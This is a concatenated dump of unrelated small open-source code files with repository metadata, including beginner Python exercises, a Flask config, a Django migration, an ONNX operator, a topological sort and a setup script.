"MIT"
] | null | null | null | ###exercicio 50
s = 0
for c in range(0, 6):
    n = int(input('Digite um numero: '))
    if n % 2 == 0:
        s += n
print('{}'.format(s))
print('Fim!!!')

# ---------------------------------------------------------------------------
# File: fun1.py  (repo: wards21-meet/meet2019y1lab6, license: MIT)
# ---------------------------------------------------------------------------
total = 0
for number in range(1, 10 + 1):
print(number)
total = total + number
print(total)
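
The loop accumulates 1 + 2 + … + 10, so (assuming the final print sits outside the loop) the printed total is the tenth triangular number, which the closed form n·(n+1)/2 reproduces:

```python
# The running total built by the loop equals sum(range(1, 11)), which in
# turn matches the triangular-number formula n * (n + 1) // 2 for n = 10.
n = 10
total = sum(range(1, n + 1))
closed_form = n * (n + 1) // 2
```
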

# ---------------------------------------------------------------------------
# File: the_project/special_scripts/paths.py
# (repo: Sneeky-Man/The_Project, license: MIT)
# ---------------------------------------------------------------------------
# import logging
#
# from the_project.constants import TEXTURE_DICT_PATH, TEXTURE_MAIN_PATH
# from os import path
#
#
# def PathMaker(object=str, tier=int, team=str):
#     if tier == 0:
#         file_path = f"{TEXTURE_MAIN_PATH}{TEXTURE_DICT_PATH[object]}_{team}.png"
#         FileExists(file_path)
#         return file_path
#     else:
#         file_path = f"{TEXTURE_MAIN_PATH}{TEXTURE_DICT_PATH[object]}_tier_{tier}_{team}.png"
#         FileExists(file_path)
#         return file_path
#
#
# def FileExists(file_path=str):
#     """
#     This checks if a file exists
#
#     :param file_path: The path to the file
#     """
#     if path.exists(file_path) == False:
#         logging.error(f"File to Path {file_path!r} has not been found")
#         return False
#     else:
#         logging.debug(f"File {file_path!r} has been found")
#
#
#
# import logging
# from os import path
#
#
# def file_exists(file_path=str) -> bool:
#     """
#     This checks if a file exists
#
#     :param file_path: The path to the file
#     :return: A True or False, depending on if the file exists
#     """
#
#     if not path.exists(file_path):
#         logging.warning(f"File to Path {file_path!r} has not been found")
#         return False
#     else:
#         logging.info(f"File {file_path!r} has been found")
#         return True

# ---------------------------------------------------------------------------
# File: _pyvmmonitor_core_tests/test_bounds.py
# (repo: fabioz/pyvmmonitor-core, license: PSF-2.0)
# ---------------------------------------------------------------------------
def test_bounds():
    from pyvmmonitor_core.math_utils import Bounds

    bounds = Bounds()
    assert not bounds.is_valid()

    bounds.add_point((10, 10))
    assert bounds.is_valid()
    assert bounds.width == 0
    assert bounds.height == 0

    bounds.add_point((0, 0))
    assert bounds.nodes == ((0, 0), (0, 10), (10, 10), (10, 0))
    assert bounds.width == 10
    assert bounds.height == 10
    assert bounds.center == (5, 5)

    x, y, w, h = bounds
    assert (x, y, w, h) == (0, 0, 10, 10)
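
The real `Bounds` class lives in `pyvmmonitor_core.math_utils`; as a rough sketch of the behaviour the test exercises (an assumption for illustration, not the library's implementation), an axis-aligned bounding box that grows as points are added could look like this:

```python
class Bounds(object):
    """Minimal axis-aligned bounding box matching the test's expectations."""

    def __init__(self):
        self._min = None
        self._max = None

    def is_valid(self):
        # A box with no points has no extent.
        return self._min is not None

    def add_point(self, point):
        x, y = point
        if self._min is None:
            self._min, self._max = [x, y], [x, y]
        else:
            self._min = [min(self._min[0], x), min(self._min[1], y)]
            self._max = [max(self._max[0], x), max(self._max[1], y)]

    @property
    def width(self):
        return self._max[0] - self._min[0]

    @property
    def height(self):
        return self._max[1] - self._min[1]

    @property
    def center(self):
        return ((self._min[0] + self._max[0]) / 2.0,
                (self._min[1] + self._max[1]) / 2.0)

    @property
    def nodes(self):
        # Corners in counter-clockwise order starting at the minimum corner.
        (x0, y0), (x1, y1) = self._min, self._max
        return ((x0, y0), (x0, y1), (x1, y1), (x1, y0))

    def __iter__(self):
        # Unpacking yields x, y, width, height, as the test relies on.
        return iter((self._min[0], self._min[1], self.width, self.height))
```
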
| 26.1 | 64 | 0.570881 | 77 | 522 | 3.779221 | 0.337662 | 0.28866 | 0.14433 | 0.041237 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.084881 | 0.277778 | 522 | 19 | 65 | 27.473684 | 0.687003 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.6 | 1 | 0.066667 | false | 0 | 0.066667 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
22aebaf959c926238ddce858456571a8264c642b | 221 | py | Python | venv/lib/python2.7/site-packages/newrelic-2.62.0.47/newrelic/__init__.py | CharleyFarley/ovvio | 81489ee64f91e4aab908731ce6ddf59edb9314bf | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/newrelic-2.62.0.47/newrelic/__init__.py | CharleyFarley/ovvio | 81489ee64f91e4aab908731ce6ddf59edb9314bf | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/newrelic-2.62.0.47/newrelic/__init__.py | CharleyFarley/ovvio | 81489ee64f91e4aab908731ce6ddf59edb9314bf | [
"MIT"
] | null | null | null | version = '2.62.0'

try:
    from newrelic.build import build_number
except ImportError:
    build_number = 0

version_info = list(map(int, version.split('.'))) + [build_number]
version = '.'.join(map(str, version_info))
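
The snippet splits the dotted version string into integers, appends the build number, and re-joins; when `newrelic.build` cannot be imported, the build number falls back to 0 and the result is `'2.62.0.0'`. Traced step by step (using `full_version` here instead of rebinding `version`, purely for clarity):

```python
# Reproduce the version assembly above with the ImportError fallback taken.
version = '2.62.0'
build_number = 0  # fallback used when newrelic.build cannot be imported

version_info = list(map(int, version.split('.'))) + [build_number]
full_version = '.'.join(map(str, version_info))
```

Converting through `int` means the components of `version_info` compare numerically, so `[2, 62, 0]` sorts after `[2, 9, 0]`, which a plain string comparison would get wrong.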
| 22.1 | 66 | 0.696833 | 31 | 221 | 4.806452 | 0.612903 | 0.221477 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026596 | 0.149321 | 221 | 9 | 67 | 24.555556 | 0.765957 | 0 | 0 | 0 | 0 | 0 | 0.036199 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
22c501c8ec5fd7c30920ce61bf80b2121c6b3f41 | 2,601 | py | Python | config.py | fboaventura/flask-boilerplate | 9f81f1c8d5baddc326a30f64f1d7726dd55c7d4e | [
"MIT"
] | null | null | null | config.py | fboaventura/flask-boilerplate | 9f81f1c8d5baddc326a30f64f1d7726dd55c7d4e | [
"MIT"
] | 73 | 2021-03-22T14:24:20.000Z | 2022-03-31T23:46:50.000Z | config.py | fboaventura/flask-boilerplate | 9f81f1c8d5baddc326a30f64f1d7726dd55c7d4e | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
Flask + Python3 application template
Author: Frederico Freire Boaventura <frederico@boaventura.net>
URL: https://gitlab.com/ffb-portfolio/websites/flask-boilerplate
     https://github.com/fboaventura/flask-boilerplate
Licence: GPLv3
"""
import os

from dotenv import load_dotenv, dotenv_values

basedir = os.path.abspath(os.path.dirname(__file__))
load_dotenv(os.path.join(basedir, '.env'))
cnf = dotenv_values()


class Config(object):
    """
    Configuration base, for all environments.
    """
    APP_NAME = os.environ.get('APP_NAME', 'MyAppName')
    SECRET_KEY = os.environ.get('SECRET_KEY', 'SUPER_SECRET_PRODUCTION_KEY')
    DEBUG = os.environ.get('DEBUG', False)
    TESTING = os.environ.get('TESTING', False)

    DB_SCHEMA = os.environ.get('DB_SCHEMA', 'sqlite')
    DB_NAME = os.environ.get('DB_NAME', 'app.db')
    DB_USERNAME = os.environ.get('DB_USERNAME')
    DB_PASSWORD = os.environ.get('DB_PASSWORD')
    DB_AUTH = '{}:{}'.format(DB_USERNAME, DB_PASSWORD) if DB_USERNAME else ''
    DB_HOSTNAME = os.environ.get('DB_HOSTNAME')
    DB_PORT = os.environ.get('DB_PORT', '')

    if DB_SCHEMA and DB_SCHEMA == 'sqlite':
        SQLALCHEMY_DATABASE_URI = 'sqlite:///{}'.format(os.path.join(basedir, DB_NAME))
    elif DB_SCHEMA:
        SQLALCHEMY_DATABASE_URI = '{}://{}@{}{}/{}'.format(DB_SCHEMA, DB_AUTH, DB_HOSTNAME, DB_PORT, DB_NAME)

    SQLALCHEMY_TRACK_MODIFICATIONS = False
    BOOTSTRAP_FONTAWESOME = True
    CSRF_ENABLED = True

    ADMINS = os.environ.get('ADMINS', [])

    BABEL_DEFAULT_LOCALE = os.environ.get('LOCALE', 'en')
    LANGUAGES = os.environ.get('LANGUAGES', ['en', 'pt_BR'])
    BABEL_DEFAULT_TIMEZONE = os.environ.get('TIMEZONE', 'UTC')

    MAIL_SERVER = os.environ.get('MAIL_SERVER', 'localhost')
    MAIL_PORT = int(os.environ.get('MAIL_PORT', 25))
    MAIL_USE_TLS = os.environ.get('MAIL_USE_TLS', False)
    MAIL_USERNAME = os.environ.get('MAIL_USERNAME')
    MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')
    MAIL_DEBUG = os.environ.get('MAIL_DEBUG', False)

    COMPRESS_MIMETYPES = ['text/html', 'text/css', 'text/xml', 'application/json', 'application/javascript']
    COMPRESS_LEVEL = 6
    COMPRESS_MIN_SIZE = 500

    CACHE_TYPE = 'simple'

    # Get your reCaptcha key on: https://www.google.com/recaptcha/admin/create
    # RECAPTCHA_PUBLIC_KEY = "6LffFNwSAAAAAFcWVy__EnOCsNZcG2fVHFjTBvRP"
    # RECAPTCHA_PRIVATE_KEY = "6LffFNwSAAAAAO7UURCGI7qQ811SOSZlgU69rvv7"


class TestConfig(Config):
    TESTING = True
    SQLALCHEMY_DATABASE_URI = 'sqlite:///app_test.db'
    SQLALCHEMY_TRACK_MODIFICATIONS = False
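
Nearly every setting in the class follows the same `os.environ.get(key, default)` pattern: unset variables fall back silently, and since environment values are always strings, numeric settings need an explicit cast, as `MAIL_PORT` shows. A small illustration (the `DEMO_*` variable names are made up for the example):

```python
import os

# Unset key: os.environ.get returns the supplied default.
os.environ.pop('DEMO_APP_NAME', None)   # ensure the variable is unset
app_name = os.environ.get('DEMO_APP_NAME', 'MyAppName')

# Set key: the value arrives as a string and must be cast for numeric use,
# mirroring MAIL_PORT = int(os.environ.get('MAIL_PORT', 25)) above.
os.environ['DEMO_MAIL_PORT'] = '587'
mail_port = int(os.environ.get('DEMO_MAIL_PORT', 25))
```

One caveat of the pattern: a default like `False` for `DEBUG` is only used when the variable is absent; setting `DEBUG=False` in the environment yields the truthy string `'False'`, so boolean settings usually need explicit parsing as well.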

# ---------------------------------------------------------------------------
# File: backend/app/migrations/0006_auto_20220412_1034.py
# (repo: griviala/garpix_page, license: MIT)
# ---------------------------------------------------------------------------
# Generated by Django 3.1 on 2022-04-12 10:34
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('app', '0005_textdescriptioncomponent'),
    ]

    operations = [
        migrations.AddField(
            model_name='textcomponent',
            name='text_en',
            field=models.TextField(null=True, verbose_name='Текст'),
        ),
        migrations.AddField(
            model_name='textdescriptioncomponent',
            name='description_en',
            field=models.TextField(null=True, verbose_name='Описание'),
        ),
        migrations.AddField(
            model_name='textdescriptioncomponent',
            name='text_en',
            field=models.TextField(null=True, verbose_name='Текст'),
        ),
    ]

# ---------------------------------------------------------------------------
# File: mlprodict/onnxrt/ops_cpu/op_compress.py
# (repo: sdpython/mlprodic, license: MIT)
# ---------------------------------------------------------------------------
# -*- encoding: utf-8 -*-
# pylint: disable=E0203,E1101,C0111
"""
@file
@brief Runtime operator.
"""
import numpy

from ..shape_object import ShapeObject
from ._op import OpRun, DefaultNone


class Compress(OpRun):

    atts = {'axis': DefaultNone}

    def __init__(self, onnx_node, desc=None, **options):
        OpRun.__init__(self, onnx_node, desc=desc,
                       expected_attributes=Compress.atts,
                       **options)

    def _run(self, x, condition):  # pylint: disable=W0221
        if self.inplaces.get(0, False):
            return (numpy.compress(condition, x, axis=self.axis, out=x), )
        return (numpy.compress(condition, x, axis=self.axis), )

    def _infer_shapes(self, x, condition):  # pylint: disable=W0221
        return (ShapeObject(None, dtype=x.dtype), )

    def _infer_types(self, x, condition):  # pylint: disable=W0221
        return (x, )

    def to_python(self, inputs):
        if self.axis is None:
            return "import numpy\nreturn numpy.compress(%s, %s)" % tuple(inputs)
        return "import numpy\nreturn numpy.compress(%s, %s, axis=%d)" % (
            tuple(inputs) + (self.axis, ))

    def _infer_sizes(self, x, condition):  # pylint: disable=W0221
        res = self.run(x, condition)
        return (dict(temp=0), ) + res
| 31.780488 | 80 | 0.61627 | 161 | 1,303 | 4.857143 | 0.385093 | 0.08312 | 0.071611 | 0.102302 | 0.434783 | 0.383632 | 0.30179 | 0.204604 | 0 | 0 | 0 | 0.031536 | 0.245587 | 1,303 | 40 | 81 | 32.575 | 0.763988 | 0.13584 | 0 | 0 | 0 | 0 | 0.088949 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.24 | false | 0 | 0.2 | 0.08 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
22f711c37949b44d585d37012cc7f274251ad701 | 1,242 | py | Python | personal_env/lib/python3.8/site-packages/django/utils/topological_sort.py | jestinmwilson/personal-website | 6e47a7f33ed3b1ca5c1d42c89c5380d22992ed74 | [
"MIT"
] | null | null | null | personal_env/lib/python3.8/site-packages/django/utils/topological_sort.py | jestinmwilson/personal-website | 6e47a7f33ed3b1ca5c1d42c89c5380d22992ed74 | [
"MIT"
] | null | null | null | personal_env/lib/python3.8/site-packages/django/utils/topological_sort.py | jestinmwilson/personal-website | 6e47a7f33ed3b1ca5c1d42c89c5380d22992ed74 | [
"MIT"
] | null | null | null | class CyclicDependencyError(ValueError):
pass
def topological_sort_as_sets(dependency_graph):
"""
Variation of Kahn's algorithm (1962) that returns sets.
Take a dependency graph as a dictionary of node => dependencies.
Yield sets of items in topological order, where the first set contains
all nodes without dependencies, and each following set contains all
nodes that may depend on the nodes only in the previously yielded sets.
"""
todo = dependency_graph.copy()
while todo:
current = {node for node, deps in todo.items() if not deps}
if not current:
raise CyclicDependencyError('Cyclic dependency in graph: {}'.format(
', '.join(repr(x) for x in todo.items())))
yield current
# remove current from todo's nodes & dependencies
todo = {node: (dependencies - current) for node, dependencies in
todo.items() if node not in current}
def stable_topological_sort(nodes, dependency_graph):
result = []
for layer in topological_sort_as_sets(dependency_graph):
for node in nodes:
if node in layer:
result.append(node)
return result
| 33.567568 | 81 | 0.644928 | 154 | 1,242 | 5.123377 | 0.428571 | 0.095057 | 0.041825 | 0.053232 | 0.091255 | 0.091255 | 0 | 0 | 0 | 0 | 0 | 0.004515 | 0.286634 | 1,242 | 36 | 82 | 34.5 | 0.886005 | 0.307568 | 0 | 0 | 0 | 0 | 0.040404 | 0 | 0 | 0 | 0 | 0.027778 | 0 | 1 | 0.105263 | false | 0.052632 | 0 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
22fd3d957808b6194bf8b8bdb701b95003ede090 | 404 | py | Python | PythonExercicios/ex027.py | Luis-Emanuel/Python | 92936dfb005b9755a53425d16c3ff54119eebe78 | [
"MIT"
] | null | null | null | PythonExercicios/ex027.py | Luis-Emanuel/Python | 92936dfb005b9755a53425d16c3ff54119eebe78 | [
"MIT"
] | null | null | null | PythonExercicios/ex027.py | Luis-Emanuel/Python | 92936dfb005b9755a53425d16c3ff54119eebe78 | [
"MIT"
] | null | null | null | #Faça um program que leia o nome completo de uma pessoa, mostrando em seguinda o primeiro e último nome separados.
#EX: Ana Maria de Sousa/ primeiro = Ana/ segundo = Sousa
nome = str(input('Digite seu nome completo: ')).strip().upper()
nomes = nome.split()
print('Muito prazer em te conhecer!')
print('Seu primeiro nome é {}'.format(nomes[0]))
print('Seu último nome é {}'.format(nomes[len(nomes) - 1]))
| 50.5 | 114 | 0.715347 | 65 | 404 | 4.446154 | 0.630769 | 0.083045 | 0.076125 | 0.110727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00578 | 0.143564 | 404 | 7 | 115 | 57.714286 | 0.82948 | 0.415842 | 0 | 0 | 0 | 0 | 0.410256 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.6 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
22fea4bc6dbb3a13a1aabe2bb01cc844972acf47 | 951 | py | Python | apps/blog/templatetags/myapp_markup.py | haohaohihi/my_django_blog | 8115819d099566d5af75b9c2c8c4aca42b27f01b | [
"Apache-2.0"
] | null | null | null | apps/blog/templatetags/myapp_markup.py | haohaohihi/my_django_blog | 8115819d099566d5af75b9c2c8c4aca42b27f01b | [
"Apache-2.0"
] | null | null | null | apps/blog/templatetags/myapp_markup.py | haohaohihi/my_django_blog | 8115819d099566d5af75b9c2c8c4aca42b27f01b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from django import template
from django.template.defaultfilters import stringfilter
from django.utils.safestring import mark_safe
import mistune
from pygments import highlight
from pygments.lexers import get_lexer_by_name
from pygments.formatters import HtmlFormatter
register = template.Library()
class HighlightRenderer(mistune.Renderer):
def block_code(self, code, lang):
if not lang:
return '\n<pre><code>%s</code></pre>\n' % \
mistune.escape(code)
lexer = get_lexer_by_name(lang, stripall=True)
formatter = HtmlFormatter()
return highlight(code, lexer, formatter)
renderer = HighlightRenderer()
markdown = mistune.Markdown(renderer=renderer)
@register.filter(is_safe=True)
@stringfilter
def md1(value):
return mark_safe(markdown(value))
| 27.970588 | 56 | 0.701367 | 111 | 951 | 5.918919 | 0.468468 | 0.045662 | 0.030441 | 0.042618 | 0.118721 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002635 | 0.201893 | 951 | 33 | 57 | 28.818182 | 0.862978 | 0.044164 | 0 | 0.086957 | 0 | 0 | 0.034325 | 0.034325 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.304348 | 0 | 0.565217 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
fe00e10bdb1af8b15403730b50edc27c8acb88b3 | 882 | py | Python | apps/profile/management/commands/reimport_stripe_history.py | Paul3MK/NewsBlur | f912d100c2867e5366fca92abadc50d4253a41d8 | [
"MIT"
] | 3,073 | 2015-01-01T07:20:18.000Z | 2022-03-31T20:33:41.000Z | apps/profile/management/commands/reimport_stripe_history.py | Paul3MK/NewsBlur | f912d100c2867e5366fca92abadc50d4253a41d8 | [
"MIT"
] | 1,054 | 2015-01-02T13:32:35.000Z | 2022-03-30T04:21:21.000Z | apps/profile/management/commands/reimport_stripe_history.py | Paul3MK/NewsBlur | f912d100c2867e5366fca92abadc50d4253a41d8 | [
"MIT"
] | 676 | 2015-01-03T16:40:29.000Z | 2022-03-30T14:00:40.000Z | import stripe, datetime, time
from django.conf import settings
from django.core.management.base import BaseCommand
from utils import log as logging
from apps.profile.models import Profile
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument("-d", "--days", dest="days", nargs=1, type=int, default=365, help="Number of days to go back")
parser.add_argument("-l", "--limit", dest="limit", nargs=1, type=int, default=100, help="Charges per batch")
parser.add_argument("-s", "--start", dest="start", nargs=1, type=str, default=None, help="Offset customer_id (starting_after)")
def handle(self, *args, **options):
limit = options.get('limit')
days = int(options.get('days'))
starting_after = options.get('start')
Profile.reimport_stripe_history(limit, days, starting_after) | 42 | 140 | 0.68254 | 119 | 882 | 4.97479 | 0.529412 | 0.045608 | 0.086149 | 0.043919 | 0.067568 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012295 | 0.170068 | 882 | 21 | 141 | 42 | 0.796448 | 0 | 0 | 0 | 0 | 0 | 0.161948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.4 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
fe0cbd28f8c6fb1e81384c0bff59a3911acf954b | 51 | py | Python | model/infrastructure/__init__.py | e-kolpakov/study-model | e10dd9f0d876c8d434fef99c5ffea80b385ec9ed | [
"MIT"
] | 2 | 2019-04-25T04:59:02.000Z | 2019-05-09T06:14:04.000Z | model/infrastructure/__init__.py | e-kolpakov/study-model | e10dd9f0d876c8d434fef99c5ffea80b385ec9ed | [
"MIT"
] | null | null | null | model/infrastructure/__init__.py | e-kolpakov/study-model | e10dd9f0d876c8d434fef99c5ffea80b385ec9ed | [
"MIT"
] | null | null | null | __author__ = 'e.kolpakov'
INFINITY = float('Inf')
| 12.75 | 25 | 0.686275 | 6 | 51 | 5.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137255 | 51 | 3 | 26 | 17 | 0.704545 | 0 | 0 | 0 | 0 | 0 | 0.254902 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fe0d79f459c5738c3c8cc8818ec8a31e36f0d438 | 1,209 | py | Python | setup.py | tamaswells/Nanocut_redistribute | 3103eaa3c015ab1c04fb254d51c263a00df90cae | [
"BSD-2-Clause"
] | 1 | 2020-05-12T23:52:02.000Z | 2020-05-12T23:52:02.000Z | setup.py | tamaswells/Nanocut_redistribute | 3103eaa3c015ab1c04fb254d51c263a00df90cae | [
"BSD-2-Clause"
] | null | null | null | setup.py | tamaswells/Nanocut_redistribute | 3103eaa3c015ab1c04fb254d51c263a00df90cae | [
"BSD-2-Clause"
] | 3 | 2019-02-27T07:03:07.000Z | 2021-04-27T14:44:22.000Z | #!/usr/bin/env python3.2
from distutils.core import setup
setup(name="nanocut",
version="12.12",
description="Cutting out various shapes from crystals",
author="Florian Uekermann, Sebastian Fiedler, Bálint Aradi",
author_email="baradi09@gmail.com",
url="http://bitbucket.org/aradi/nanocut",
license="BSD",
platforms="platform independent",
package_dir={ "": "src"},
packages=[ "nanocut", ],
scripts=[ "bin/nanocut" ],
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 3.2",
"Environment :: Console",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering",
],
long_description="""
Cutting out various shapes from crystals
----------------------------------------
This tool provides you the possibility to cut out various forms from crystal
structures. You can create dots, wires, surfaces or any arbitrary periodic
or non-periodic structures, by specifying the crystal structure and the bounding
surfaces of the object to be cut out.
""")
| 36.636364 | 80 | 0.64268 | 133 | 1,209 | 5.819549 | 0.706767 | 0.03876 | 0.054264 | 0.072351 | 0.118863 | 0.118863 | 0.118863 | 0 | 0 | 0 | 0 | 0.010515 | 0.2134 | 1,209 | 32 | 81 | 37.78125 | 0.803365 | 0.019024 | 0 | 0 | 0 | 0 | 0.659916 | 0.052321 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.034483 | 0 | 0.034483 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |